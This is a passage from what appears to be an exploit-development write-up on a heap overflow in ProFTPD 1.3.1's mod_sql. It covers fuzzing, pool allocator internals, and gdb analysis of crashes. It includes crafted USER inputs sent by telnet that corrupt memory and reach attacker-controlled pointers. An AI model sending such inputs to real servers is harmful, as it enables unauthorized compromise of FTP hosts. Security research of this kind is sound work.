then need to take your local IP address into account when exploiting remote
hosts. 

--[ 3 - Exploring what we can control

------[ 3.1 - Automating tasks

I'm a big fan of automating as much stuff as possible. In order to get a 
ten thousand foot view of what I can do, I used python-ptrace [3] and
pyevolve [4] to:

  - Generate input strings
  - Debug proftpd and record before/after overwriting the memory allocated 
    in sql_prepare_where
  - Analyze how "interesting" the results of input strings where.
    - Process exited? Completely uninteresting. 
    - SEGV'd? 
      - Gather backtraces / register contents / see if the program crashed 
        with our directly controllable user input / etc.

Pyevolve, for the most part, was useful for mutating the input strings to 
explore the code paths leading to crashes..

By doing these tasks, I was able to find the more interesting paths that 
could easily be hit, while I was flicking over the ProFTPD pool allocator
... 

------[ 3.2 - ProFTPD Pool allocator

A high level overview for the ProFTPD pool allocator (src/pool.c) is given 
at [5], but here are the quick nuts and bolts of it:

- Pools are allocated, and is subdivided into blocks.

- Pools have cleanup handlers (very useful - used in proftpd-not-pro-enough
  [6] exploit by solar to gain code execution).

- More blocks are malloc()'d if the pool is out of space.

- Memory is never free()'d unless developer mode is enabled, and that's
  only at daemon shut down. 

- In order to allocate memory, the single linked list of free blocks is
  checked to see if the allocation request can be satisfied first without 
  calling malloc().

The pool structure is defined as:

---
196 struct pool {
197   union block_hdr *first;
198   union block_hdr *last;
199   struct cleanup *cleanups;
200   struct pool *sub_pools;
201   struct pool *sub_next;
202   struct pool *sub_prev;
203   struct pool *parent;
204   char *free_first_avail;
205   const char *tag;
206 };
---

The cleanup structure looks like:

---
655 typedef struct cleanup {
656   void *data;
657   void (*plain_cleanup_cb)(void *);
658   void (*child_cleanup_cb)(void *);
659   struct cleanup *next;
660 } cleanup_t;
---

Overwriting a cleanup structure, or a pool structure, would allow us to
arbitrarily execute code when the pool is cleared/destroyed.

The block structure is defined as:

---
46 union block_hdr {
47   union align a;
48
49   /* Padding */
50 #if defined(_LP64) || defined(__LP64__)
51   char pad[32];
52 #endif
53
54   /* Actual header */
55   struct {
56     char *endp;
57     union block_hdr *next;
58     char *first_avail;
59   } h;
60 };
---

Now, we trace pcalloc() as it's called in sql_prepare_where() (and
numerously throughout the ProFTPD code), just to see what situations will 
allow us to return pointers that we control. Controlling these returned 
pointers would allow us to overwrite arbitrary memory, hopefully with 
content that we can control.

---
481 void *pcalloc(struct pool *p, int sz) {
482   void *res = palloc(p, sz);
483   memset(res, '\0', sz);
484   return res;
485 }
---

gives us:

---
473 void *palloc(struct pool *p, int sz) {
474   return alloc_pool(p, sz, FALSE);
475 }
---

which in turn gives us:

---
435 static void *alloc_pool(struct pool *p, int reqsz, int exact) {
436
437   /* Round up requested size to an even number of aligned units */
438   int nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
439   int sz = nclicks * CLICK_SZ;
440
441   /* For performance, see if space is available in the most recently
442    * allocated block.
443    */
444
445   union block_hdr *blok = p->last;
446   char *first_avail = blok->h.first_avail;
447   char *new_first_avail;
448
449   if (reqsz <= 0)
450     return NULL;
451
452   new_first_avail = first_avail + sz;
453
454   if (new_first_avail <= blok->h.endp) {                        [1]
455     blok->h.first_avail = new_first_avail;
456     return (void *) first_avail;
457   }
458
459   /* Need a new one that's big enough */
460   pr_alarms_block();
461
462   blok = new_block(sz, exact);                                  [2]
463   p->last->h.next = blok;
464   p->last = blok;
465
466   first_avail = blok->h.first_avail;                            [3]
467   blok->h.first_avail += sz;
468
469   pr_alarms_unblock();
470   return (void *) first_avail;
471 }
---

The check at [1] checks to see if the request can be satisfied from the 
pool allocation itself..

The call at [2] requests a "new_block" of memory. The returned pointer is 
determined at [3], indicating that the first_avail pointer at least needs 
to be modified.

---
151 /* Get a new block, from the free list if possible, otherwise malloc a 
       new
152  * one.  minsz is the requested size of the block to be allocated.
153  * If exact is TRUE, then minsz is the exact size of the allocated 
       block;
154  * otherwise, the allocated size will be rounded up from minsz to the 
       nearest
155  * multiple of BLOCK_MINFREE.
156  *
157  * Important: BLOCK ALARMS BEFORE CALLING
158  */
159
160 static union block_hdr *new_block(int minsz, int exact) {
161   union block_hdr **lastptr = &block_freelist;
162   union block_hdr *blok = block_freelist;
163
164   if (!exact) {
165     minsz = 1 + ((minsz - 1) / BLOCK_MINFREE);
166     minsz *= BLOCK_MINFREE;
167   }
168
169   /* Check if we have anything of the requested size on our free list 
         first...
170    */
171   while (blok) {
172     if (minsz <= blok->h.endp - blok->h.first_avail) {
173       *lastptr = blok->h.next;
174       blok->h.next = NULL;
175
176       stat_freehit++;
177       return blok;
178
179     } else {
180       lastptr = &blok->h.next;
181       blok = blok->h.next;
182     }
183   }
184
185   /* Nope...damn.  Have to malloc() a new one. */
186   stat_malloc++;
187   return malloc_block(minsz);
188 }
---

BLOCK_MINFREE is defined to PR_TUNABLE_NEW_POOL_SIZE, which is defined to 
512 bytes. 

So, we can see that if we can get the stars to align correctly, we can gain
code execution via:

  - Pool cleanup/destruction
  - Corrupting the first_avail pointer in a block.

The second method is a little more effort, but it may not be possible to 
hit the first.

There are other avenues potentially available such as unlink() style
corruption, or other heap content overwrites, but they were not explored in
depth. 

------[ 3.3 - Examining backtraces

After leaving the proftpd input fuzzing / automated crash analysis code [7] 
running for a while, I decided to stop it and examine some of the 
backtraces it created, in order to see what was found, and if any indicated
that they where able to gain direct code execution, or useful memory 
corruption.

# echo backtraces: `ls -l backtrace.* | wc -l` ; echo unique backtraces:
  `md5su m backtrace.* | awk '{ print $1 }' | sort | uniq`
backtraces: 4280
unique backtraces: 11380f2c8ce44d29b93b9bc6308692ae
2813d637d735be610a460a75db061f6b 3d10e2a054d8124ab4de5b588c592830
844319188798d7742af43d10f6541a61 914b175392625fe75c2b16dc18bfb250
b975726b4537662f3f5ddf377ea26c20 ccbbd918ad0dbc7a869184dc2eb9cc50
f1bfd5428c97b9d68a4beb6fb8286b70

Some of these back traces are very similiar, only real change in where they
are called from. However, seeing that the code can be reached from multiple
places is good; as it gives us more chances to take control of the remote
process.

Flicking through the backtraces:

--------[ 3.3.1 - 11380f2c8ce44d29b93b9bc6308692ae backtrace ]

# cat bt_frames.99861.0
EIP: 0xb7b7e67a, EBP: 0xbfd0a0a8, memset
EIP: 0x08055034, EBP: 0xbfd0a0d8, pstrcat
EIP: 0x080c0d85, EBP: 0xbfd0a118, cmd_select
EIP: 0x080c26f2, EBP: 0xbfd0a148, _sql_dispatch
EIP: 0x080c4354, EBP: 0xbfd0a1f8, _sql_getpasswd
EIP: 0x080c514d, EBP: 0xbfd0a2d8, _sql_getgroups
EIP: 0x080ca70e, EBP: 0xbfd0a308, cmd_getgroups
EIP: 0x080718a6, EBP: 0xbfd0a328, call_module
EIP: 0x0807339e, EBP: 0xbfd0a358, dispatch_auth
EIP: 0x0807481d, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start

# cat regs.99861.0
EAX: 0x00000000
EBX: 0x0882d654
ECX: 0x0000103c
EDX: 0x00000001
ESI: 0x080d4960
EDI: 0x41346141
EBP: 0xbfd0a0a8
ESP: 0xbfd0a078
EIP: 0xb7b7e67a

So far, we can see we are memset()'ing a controllable pointer :D

Looking further at _sql_getpasswd in the backtrace:

(gdb) l *0x080c4354
0x80c4354 is in _sql_getpasswd (mod_sql.c:1252).
1247      }
1248
1249      if (!cmap.usercustom) {
1250        where = sql_prepare_where(0, cmd, 2, usrwhere, cmap.userwhere, 
                                      NULL);
1251
1252        mr = _sql_dispatch(_sql_make_cmd(cmd->tmp_pool, 5, "default",
1253          cmap.usrtable, cmap.usrfields, where, "1"), "sql_select");
1254
1255        if (check_response(mr) < 0)
1256          return NULL;

(gdb) l *0x080c0d85
0x80c0d85 is in cmd_select (mod_sql_mysql.c:812).
807       } else {
808         query = pstrcat(cmd->tmp_pool, cmd->argv[2], " FROM ", 
                            cmd->argv[1], NULL);
809
810         if (cmd->argc > 3 &&
811             cmd->argv[3])
812           query = pstrcat(cmd->tmp_pool, query, " WHERE ", 
                              cmd->argv[3], NULL);
813
814         if (cmd->argc > 4 &&
815             cmd->argv[4])
816           query = pstrcat(cmd->tmp_pool, query, " LIMIT ", 
                              cmd->argv[4], NULL);

This backtrace is interesting, as it's appending contents we directly 
control to the chunk. Playing further:

# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.1 Server (ProFTPD Default Installation) [127.0.0.1]
USER A%m%m%mA%m%Z%Z%m%m%m%m%Z%mA%m%m%m%mA%m%m%m%m%m%m%m%mA%mA%m%Z%Z%mAA%m%m
%ZA%m%m%m%ZA%m%m%m%Z%m%m%Z%m
331 Password required for A%m%m%mA%m%Z%Z%m%m%m%m%Z%mA%m%m%m%mA%m%m%m%m%m%m%
m%mA%mA%m%Z%Z%mAA%m%m%ZA%m%m%m%ZA%m%m%m%Z%m%m%Z%m
USER AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mAA%mA%ZAA%m%m%m%
m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9
Ac0A

...

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7c7a6b0 (LWP 19840)]
0xb7cf467a in memset () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0xb7cf467a in memset () from /lib/tls/i686/cmov/libc.so.6
#1  0x08054d1a in pcalloc (p=0x98a84c4, sz=4156) at pool.c:481
#2  0x08055034 in pstrcat (p=0x98a84c4) at pool.c:580
#3  0x080c0d85 in cmd_select (cmd=0x98a84ec) at mod_sql_mysql.c:812
#4  0x080c26f2 in _sql_dispatch (cmd=0x98a84ec, cmdname=0x80e4a3d 
    "sql_select") at mod_sql.c:393
#5  0x080c4354 in _sql_getpasswd (cmd=0x98a1ad4, p=0xbfa8368c) at 
    mod_sql.c:1252
#6  0x080c514d in _sql_getgroups (cmd=0x98a1ad4) at mod_sql.c:1599
#7  0x080ca70e in cmd_getgroups (cmd=0x98a1ad4) at mod_sql.c:3612
#8  0x080718a6 in call_module (m=0x80ee940, func=0x80ca6bd <cmd_getgroups>,
    cmd=0x98a1ad4) at modules.c:439
#9  0x0807339e in dispatch_auth (cmd=0x98a1ad4, match=0x80d9685 
    "getgroups", m=0x0) at auth.c:89
#10 0x0807481d in pr_auth_getgroups (p=0x98a1a04,
    name=0x9852eec "AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mA
    A%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab
    3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A", group_ids=0x80fb0bc, group_names=0x80fb0c0) 
    at auth.c:691
#11 0x08074a98 in auth_anonymous_group (p=0x98a1a04,
    user=0x9852eec "AAAAAAAAAA%m%m%mA%m%m%mA%m%mAA%m%m%m%m%mA%m%Z%m%mA%m%mA
    A%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab
    3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A") at auth.c:751
#12 0x08074ea7 in pr_auth_get_anon_config (p=0x98a1a04, 
    login_name=0xbfa838f8, user_name=0x0, anon_name=0x0) at auth.c:864
#13 0x080a4b5c in auth_user (cmd=0x9852e94) at mod_auth.c:1831
#14 0x080718a6 in call_module (m=0x80ec9e0, func=0x80a4a10 <auth_user>, 
    cmd=0x9852e94) at modules.c:439
#15 0x0804c651 in _dispatch (cmd=0x9852e94, cmd_type=2, validate=1, 
    match=0x9852ee4 "USER") at main.c:424
#16 0x0804caba in pr_cmd_dispatch (cmd=0x9852e94) at main.c:523
#17 0x0804d4ee in cmd_loop (server=0x9853af4, c=0x988abdc) at main.c:750
#18 0x0804ea36 in fork_server (fd=1, l=0x988a7bc, nofork=0 '\0') at 
    main.c:1257
#19 0x0804f1cf in daemon_loop () at main.c:1464
#20 0x080522c6 in standalone_main () at main.c:2294
#21 0x08053109 in main (argc=4, argv=0xbfa84374, envp=0xbfa84388) at 
    main.c:2878
(gdb) i r
eax            0x0      0
ecx            0x103c   4156
edx            0x1      1
ebx            0x98a2444        160048196
esp            0xbfa834a8       0xbfa834a8
ebp            0xbfa834d8       0xbfa834d8
esi            0x80d4960        135088480
edi            0x41346141       1093951809
...
# ruby pattern_offset.rb 0x41346141
12
...
(gdb) frame 2
#2  0x08055034 in pstrcat (p=0x98a84c4) at pool.c:580
580       res = (char *) pcalloc(p, len + 1);
(gdb) info locals
argp = 0x0
res = 0x0
len = 4155
dummy = 0xbfa83524 ...
(gdb) x/32x $esp
0xbfa834e0:     0x098a84c4      0x0000103c      0x00000000      0x00000000
0xbfa834f0:     0x00000000      0x0988b62c      0xbfa83524      0x0000103b
0xbfa83500:     0x00000000      0x00000000      0xbfa83548      0x080c0d85
0xbfa83510:     0x098a84c4      0x098a854c      0x080e40e5      0x098aa7d4
0xbfa83520:     0x00000000      0x080ef060      0x00000000      0x00000000
0xbfa83530:     0x00000000      0x098a854c      0x00000000      0x098a8534
0xbfa83540:     0x0988b62c      0x0988b68c      0xbfa83578      0x080c26f2
0xbfa83550:     0x098a84ec      0x080e441a      0x098aa7d4      0x098a3874
(gdb) x/s  0x098a854c
0x98a854c:       "userid, passwd, uid, gid, homedir, shell FROM ftpuser"
(gdb) x/s  0x080e40e5
0x80e40e5:       " WHERE "
(gdb) x/s  0x098aa7d4
0x98aa7d4:       "(userid='", 'A' <repeats 20 times>, "%m%m%mA%m%m%mA%m%mAA
%m%m%m%m%mA%m%Z%m%mA%m%mAA%mA%ZAA%m%m%m%m%m%mA%m%ZAAA%mAa0Aa1Aa2Aa3Aa4Aa5Aa
6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0", 'A' <repeats 11 times>, 
"%m%m%mA%m%m%mA%m%mAA%m"...

This crash is excellent, but it has several drawbacks:
  - No direct control of EIP, thus requiring overwriting larger chunks of 
    memory which may be problematic.
  - Configuration dependent :(
    - Both SQLUserInfo and SQLGroupInfo specify table names and table 
      entries. For example:
      - SQLUserInfo ftpuser userid passwd uid gid homedir shell
      - SQLGroupInfo ftpgroup groupname gid members
    - We could collect common configurations recommended in guides so that 
      we can take them into account when bruteforcing.. sucky though.

Let's see what the others contain before getting too excited :)

------[ 3.3.2 - 2813d637d735be610a460a75db061f6b backtrace ]

# cat bt_frames.16259.0
EIP: 0x08054b7d, EBP: 0xbfd0a1d8, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a1e8, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a1f8, destroy_pool
EIP: 0x0807389f, EBP: 0xbfd0a248, pr_auth_getpwnam
EIP: 0x080a0e3a, EBP: 0xbfd0a488, setup_env
EIP: 0x080a51ca, EBP: 0xbfd0a4d8, auth_pass
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.16259.0
EAX: 0x62413362
EBX: 0x0000b25d
ECX: 0x00000002
EDX: 0x0882f8e8
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a1d8
ESP: 0xbfd0a1d0
EIP: 0x08054b7d

EAX looks like a modified pointer, and we can see we're in the
destroy_pool / clean_pool code. No arbitrary EIP yet :~(

(gdb) l *0x08054b7d
0x8054b7d is in destroy_pool (pool.c:415).
410         return;
411
412       pr_alarms_block();
413
414       if (p->parent) {
415         if (p->parent->sub_pools == p)
416           p->parent->sub_pools = p->sub_next;
417
418         if (p->sub_prev)
419           p->sub_prev->sub_next = p->sub_next;

(gdb) l * 0x08054b0c
0x8054b0c is in clear_pool (pool.c:395).
390       /* Run through any cleanups. */
391       run_cleanups(p->cleanups);
392       p->cleanups = NULL;
393
394       /* Destroy subpools. */
395       while (p->sub_pools)
396         destroy_pool(p->sub_pools);
397       p->sub_pools = NULL;
398
399       free_blocks(p->first->h.next);

So, we can see that we've corrupted the p->parent->sub_pools pointer. Not 
immediately interesting, as we've isolated what appears to be very 
interesting earlier on. Might be able to do some fun and games at some 
point with the old unlink() style, though.

------[ 3.3.3 - 3d10e2a054d8124ab4de5b588c592830 backtrace ]

# cat bt_frames.99758.0

EIP: 0x08054b7d, EBP: 0xbfd0a338, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a348, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.99758.0
EAX: 0x62413362
EBX: 0x0882d4ac
ECX: 0x00000002
EDX: 0x088356c8
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a338
ESP: 0xbfd0a330
EIP: 0x08054b7d

Unfortunately, EIP is the same as the 2813d637d735be610a460a75db061f6b
backtrace, except it dies with pr_auth_getgroups in the backtrace, rather 
than pr_auth_getpwnam.

------[ 3.3.4 - 844319188798d7742af43d10f6541a61 backtrace ]

# cat bt_frames.103331.0
EIP: 0x08054b7d, EBP: 0xbfd0a368, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a378, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a388, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a438, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a468, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a4a8, pr_auth_get_anon_config
EIP: 0x080c5691, EBP: 0xbfd0a4d8, sql_pre_pass
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804c9bb, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.103331.0
EAX: 0x62413362
EBX: 0x0000a2f3
ECX: 0x00000002
EDX: 0x0882f2b8
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a368
ESP: 0xbfd0a360
EIP: 0x08054b7d

Not that interesting, unfortunately. 

------[ 3.3.5 - 914b175392625fe75c2b16dc18bfb250 backtrace ]

# cat bt_frames.98014.0
EIP: 0x080544e0, EBP: 0xbfd0a368, free_blocks
EIP: 0x08054b30, EBP: 0xbfd0a378, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a388, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a438, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a468, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a4a8, pr_auth_get_anon_config
EIP: 0x080c5691, EBP: 0xbfd0a4d8, sql_pre_pass
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804c9bb, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.98014.0
EAX: 0x33614132
EBX: 0x00009bd9
ECX: 0x00000002
EDX: 0x0882ea84
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a368
ESP: 0xbfd0a350
EIP: 0x080544e0

EAX contains a corrupted value.

Looking at it further:

This GDB was configured as "i486-linux-gnu"...
(gdb) l *0x080544e0
0x80544e0 is in free_blocks (pool.c:138).
133
134       block_freelist = blok;
135
136       /* Adjust first_avail pointers */
137
138       while (blok->h.next) {
139         chk_on_blk_list(blok, old_free_list);
140         blok->h.first_avail = (char *) (blok + 1);
141         blok = blok->h.next;
142       }

This is semi-interesting, as we can overwrite something to point to the end
of the block (the start of the allocated usable memory). However, the 
blok = blok->h.next loop makes things a lot more trickier than we'd like 
(finding a suitable pointer that terminates the loop without crashing, 
etc.)

Moving on...

------[ 3.3.6 - b975726b4537662f3f5ddf377ea26c20 backtrace ]

# cat bt_frames.1575.0
EIP: 0x080544e0, EBP: 0xbfd0a338, free_blocks
EIP: 0x08054b30, EBP: 0xbfd0a348, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.1575.0
EAX: 0x33614132
EBX: 0x0882d29c
ECX: 0x00000002
EDX: 0x088398a4
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a338
ESP: 0xbfd0a320
EIP: 0x080544e0

This is a duplicate of the previous one..

------[ 3.3.7 - ccbbd918ad0dbc7a869184dc2eb9cc50 backtrace ]

# cat bt_frames.1081.0 
EIP: 0x080544e0, EBP: 0xbfd0a318, free_blocks
EIP: 0x08054b30, EBP: 0xbfd0a328, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a338, destroy_pool
EIP: 0x08054b0c, EBP: 0xbfd0a348, clear_pool
EIP: 0x08054bd1, EBP: 0xbfd0a358, destroy_pool
EIP: 0x08074a37, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.1081.0
EAX: 0x33614132
EBX: 0x0882d29c
ECX: 0x00000002
EDX: 0x08839484
ESI: 0x080d4960
EDI: 0x088161e8
EBP: 0xbfd0a318
ESP: 0xbfd0a300
EIP: 0x080544e0

Another duplicate :(

------[ 3.3.8 - f1bfd5428c97b9d68a4beb6fb8286b70 backtrace ] 

# cat bt_frames.11512.0
EIP: 0xb7b7e67a, EBP: 0xbfd0a118, memset
EIP: 0x080c2520, EBP: 0xbfd0a148, _sql_make_cmd
EIP: 0x080c4344, EBP: 0xbfd0a1f8, _sql_getpasswd
EIP: 0x080c514d, EBP: 0xbfd0a2d8, _sql_getgroups
EIP: 0x080ca70e, EBP: 0xbfd0a308, cmd_getgroups
EIP: 0x080718a6, EBP: 0xbfd0a328, call_module
EIP: 0x0807339e, EBP: 0xbfd0a358, dispatch_auth
EIP: 0x0807481d, EBP: 0xbfd0a408, pr_auth_getgroups
EIP: 0x08074a98, EBP: 0xbfd0a438, auth_anonymous_group
EIP: 0x08074ea7, EBP: 0xbfd0a478, pr_auth_get_anon_config
EIP: 0x080a4b5c, EBP: 0xbfd0a4d8, auth_user
EIP: 0x080718a6, EBP: 0xbfd0a4f8, call_module
EIP: 0x0804c651, EBP: 0xbfd0a5a8, _dispatch
EIP: 0x0804caba, EBP: 0xbfd0a5d8, pr_cmd_dispatch
EIP: 0x0804d4ee, EBP: 0xbfd0aa48, cmd_loop
EIP: 0x0804ea36, EBP: 0xbfd0ab88, fork_server
EIP: 0x0804f1cf, EBP: 0xbfd0acf8, daemon_loop
EIP: 0x080522c6, EBP: 0xbfd0ad28, standalone_main
EIP: 0x08053109, EBP: 0xbfd0aea8, main
EIP: 0xb7b1c685, EBP: 0xbfd0af18, __libc_start_main
EIP: 0x0804b841, EBP: 0x00000000, _start
# cat regs.11512.0
EAX: 0x00000000
EBX: 0x0882da74
ECX: 0x00000024
EDX: 0x00000001
ESI: 0x080d4960
EDI: 0x41346141
EBP: 0xbfd0a118
ESP: 0xbfd0a0e8
EIP: 0xb7b7e67a

EDI is a pointer we control. Looking at it further:

(gdb) l *0x080c2520
0x80c2520 is in _sql_make_cmd (mod_sql.c:350).
345       register unsigned int i = 0;
346       pool *newpool = NULL;
347       cmd_rec *cmd = NULL;
348       va_list args;
349
350       newpool = make_sub_pool(p);
351       cmd = pcalloc(newpool, sizeof(cmd_rec));
352       cmd->argc = argc;
353       cmd->stash_index = -1;
354       cmd->pool = newpool;
(gdb)
355
356       cmd->argv = pcalloc(newpool, sizeof(void *) * (argc + 1));
357       cmd->tmp_pool = newpool;
358       cmd->server = main_server;
359
360       va_start(args, argc);
361
362       for (i = 0; i < argc; i++)
363         cmd->argv[i] = (void *) va_arg(args, char *);
364
(gdb)
365       va_end(args);
366
367       cmd->argv[argc] = NULL;
368
369       return cmd;
370     }
371
372     static int check_response(modret_t *mr) {
373       if (!MODRET_ISERROR(mr))
374         return 0;

Interesting, it's in the make_sub_pool() code. Looking at it further:

---
310 struct pool *make_sub_pool(struct pool *p) {
311   union block_hdr *blok;
312   pool *new_pool;
313
314   pr_alarms_block();
315
316   blok = new_block(0, FALSE);
317
318   new_pool = (pool *) blok->h.first_avail;
319   blok->h.first_avail += POOL_HDR_BYTES;
320
321   memset(new_pool, 0, sizeof(struct pool));
322   new_pool->free_first_avail = blok->h.first_avail;
323   new_pool->first = new_pool->last = blok;
324
325   if (p) {
326     new_pool->parent = p;
327     new_pool->sub_next = p->sub_pools;
328
329     if (new_pool->sub_next)
330       new_pool->sub_next->sub_prev = new_pool;
331
332     p->sub_pools = new_pool;
333   }
334
335   pr_alarms_unblock();
336
337   return new_pool;
338 }
---

So, if we got it returning an arbitrary pointer, allocations from this
pool (if within the default pool size) will overwrite memory we
control.. let's see what could be (include/dirtree.h):

---
